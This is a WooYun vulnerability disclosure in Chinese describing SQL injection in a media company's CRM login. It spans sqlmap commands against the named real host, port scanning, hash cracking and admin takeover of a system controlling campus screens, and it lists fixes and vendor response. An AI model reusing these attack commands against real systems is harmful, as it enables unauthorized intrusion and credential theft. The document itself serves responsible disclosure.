当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0122796

漏洞标题:从一个ERP系统SQL注入到再次控制多所高校数百块屏幕媒体

相关厂商:江苏华视文化传媒有限公司

漏洞作者: 端端

提交时间:2015-06-26 09:35

修复时间:2015-08-14 13:12

公开时间:2015-08-14 13:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-26: 细节已通知厂商并且等待厂商处理中
2015-06-30: 厂商已经确认,细节仅向厂商公开
2015-07-10: 细节向核心白帽子及相关领域专家公开
2015-07-20: 细节向普通白帽子公开
2015-07-30: 细节向实习白帽子公开
2015-08-14: 细节向公众公开

简要描述:

从一个ERP系统SQL注入到控制多所高校数百块屏幕媒体

详细说明:

之前提交过 WooYun: 华视校园电视网接口设计不当(可全面控制四所高校近400块屏幕媒体)
今天突然想回过头来再看看,于是在百度里搜索 inurl:ctvc.tv

1.PNG


发现一个子域名newcrm.ctvc.tv,我想既然有newcrm那就有crm啦
果然存在子域名crm.ctvc.tv

2.PNG


随手加了个单引号,看到一闪而过好像有个错误页面,阻止js跳转之后发现是个SQL错误,看来存在SQL注入

3.PNG


丢到sqlmap里

sqlmap.py -u "http://crm.ctvc.tv/general/ERP/LOGIN/logincheck.php" --data="username=admin*&password=111111" --threads=10 --dbs


4.PNG


用的还是root账户

sqlmap.py -u "http://crm.ctvc.tv/general/ERP/LOGIN/logincheck.php" --data="username=admin*&password=111111" --threads=10 --current-user


5.PNG


获取root账户的密码

sqlmap.py -u "http://crm.ctvc.tv/general/ERP/LOGIN/logincheck.php" --data="username=admin*&password=111111" --threads=10 --password


6.PNG


发现crm.ctvc.tv上并没有开默认的mysql端口,不是换端口了就是没开
扫描一下,发现6666端口开启,后经确认是mysql服务

7.PNG


直接使用navicat连接成功

8.PNG

漏洞证明:

其旧ERP系统使用的数据库账户是root,所以还可以获取到其他数据库的信息
这里是获取到了之后要登录的系统的超级管理员账户

9.PNG


把密码的散列值丢到cmd5破解得到明文密码

10.PNG


使用刚才获取到的账户和密码登录 http://www.ctvc.tv/login.html

11.PNG


登录成功

12.PNG


可以看到此系统可以统一管理多所高校的子系统

13.PNG


这里随便找一台播放器

14.PNG


查看服务器信息

15.PNG


可以上传并部署播放器的升级包

16.PNG

修复方案:

1、过滤输入
2、及时下线旧系统
3、应用访问数据库尽量不使用root账户

版权声明:转载请注明来源 端端@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-06-30 13:11

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过软件生产厂商公开联系渠道向其邮件和电话通报,由其后续提供解决方案并协调相关用户单位处置。

最新状态:

暂无